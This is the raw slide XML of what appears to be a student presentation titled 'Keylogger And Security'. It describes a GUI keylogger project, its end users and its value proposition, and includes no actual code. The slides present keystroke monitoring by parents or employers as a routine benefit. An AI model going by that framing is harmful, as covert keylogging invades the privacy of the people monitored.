                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="-10"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b="0" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="0" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="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2" name="Diagram 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D14BACE9-9EF2-B208-287B-BAC7230D0361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="625030457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="1524000"/>
          <a:ext cx="66294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8959646" y="2971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rot="2360917">
            <a:off x="9155365" y="822092"/>
            <a:ext cx="309563" cy="33022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813425" cy="63222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5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PROJECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr sz="4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17" name="Diagram 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35CE045A-5250-0014-3E05-873FE4B7EB3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3160388358"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="703314" y="1895398"/>
          <a:ext cx="4038599"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8" name="Diagram 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685916C6-197F-03E0-91E8-9A8EBEDC3397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1377228726"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4818569" y="1876413"/>
          <a:ext cx="4173032" cy="36933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10600"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496950"/>
            <a:ext cx="5014595" cy="51815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6510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ho are the End Users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="32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428FFE47-8B9C-75EE-B4A7-A218E85938BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="1320631"/>
            <a:ext cx="8915400" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent6">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The end users of this code are individuals who need to monitor and log keystrokes on a computer system. This code provides a graphical user interface (GUI) for starting and stopping a keylogger. Here are the detailed end-user interactions:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="19" name="Diagram 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1785A-0023-876A-98FE-AC1EF7B992BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="885005084"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="804299" y="5296244"/>
          <a:ext cx="8128001" cy="923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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4EC6157-D8E7-59C5-BF66-FB3B6B0927C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="723900" y="2480834"/>
            <a:ext cx="1046162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1.General Users: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accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Monitoring Activity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General users, such as parents or employers, might use this keylogger to monitor activity on a computer. They would be able to see which keys are being pressed, held, and released.</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2.Developers and Programmers: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accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Testing Purposes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Developers can use this keylogger for testing applications, ensuring that certain keystrokes are captured correctly within their software.</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3.Security Researchers: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accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Studying Behavior</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Security professionals might use this tool to study keystroke patterns or to understand how keyloggers work, potentially developing countermeasures against malicious keylogging.</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4.IT Administrators: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accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Troubleshooting</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IT administrators could use this to troubleshoot issues with keyboards or to monitor specific actions taken on a system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685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008943">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415290"/>
            <a:ext cx="9763125" cy="57531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3335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Solution and its value proposition</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>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2" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC7C90B-2904-F4EC-0767-4E9C6974E625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071811" y="1461526"/>
            <a:ext cx="6372226" cy="11144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marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      The provided code offers a simple yet functional keylogger application with a graphical user interface (GUI).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C1B486E-38C3-D70D-2720-24566909FCD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071811" y="3127888"/>
            <a:ext cx="6096000" cy="230832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285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Value Proposition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1.Ease of Use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       2.Versatile Data Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       3.Educational Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       4.Monitoring and Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       5.Extensibility:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"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TotalTime>
  <Words>1985</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>212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vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>MATAPATI ANKITHA</vt:lpstr>
      <vt:lpstr>Keylogger And Security</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>What is the Keylogger and Security?     Keylogger and Security:</vt:lpstr>
      <vt:lpstr>Types of Keylogger</vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>PROJECT OVERVIEW</vt:lpstr>
      <vt:lpstr>Who are the End Users?</vt:lpstr>
      <vt:lpstr>Solution and its value proposition</vt:lpstr>
      <vt:lpstr>The Wow in our Solution</vt:lpstr>
      <vt:lpstr>Required libraries for implementing keylogger code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MATAPATI ANKITHA</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-13T16:07:53Z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